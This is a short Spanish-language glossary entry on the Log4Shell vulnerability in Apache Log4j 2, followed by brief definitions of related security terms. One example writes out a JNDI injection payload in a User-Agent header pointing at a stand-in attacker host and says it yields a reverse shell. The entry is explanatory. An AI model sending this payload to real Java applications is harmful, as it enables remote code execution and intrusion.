Vulnerabilidades
Log4Shell (CVE-2021-44228)
También conocido como: CVE-2021-44228, Vulnerabilidad de Log4j
Definición
Vulnerabilidad crítica de ejecución remota de código de diciembre de 2021 en Apache Log4j 2, que permitía ejecutar código arbitrario al registrar una sola cadena JNDI.
Ejemplos
- Enviar User-Agent: ${jndi:ldap://attacker.com/x} a una app web Java y obtener una shell inversa.
- Explotar un servicio Java interno registrando un valor malicioso en un campo de nombre de usuario.
Términos relacionados
CVE (Common Vulnerabilities and Exposures)
Catálogo público que asigna un identificador único a cada vulnerabilidad divulgada para referenciarla de forma inequívoca en todo el sector.
Vulnerabilidad de día cero
Fallo de seguridad desconocido por el fabricante (o sin parche disponible) en el momento de su descubrimiento o explotación.
Deserialización insegura
Vulnerabilidad en la que una aplicación deserializa datos no confiables, permitiendo al atacante instanciar objetos arbitrarios y, a menudo, lograr ejecución remota de código.
Ataque a la cadena de suministro
Ataque que compromete a un proveedor de software, hardware o servicios de confianza para llegar a sus clientes finales.
Exploit
Código, datos o técnica que aprovecha una vulnerabilidad para provocar un comportamiento no previsto, como ejecución de código, escalada de privilegios o fuga de información.
Vulnerabilidad explotada conocida (KEV)
CVE que CISA (EE. UU.) confirma como activamente explotada y añade a su catálogo público KEV, imponiendo plazos de remediación a las agencias federales.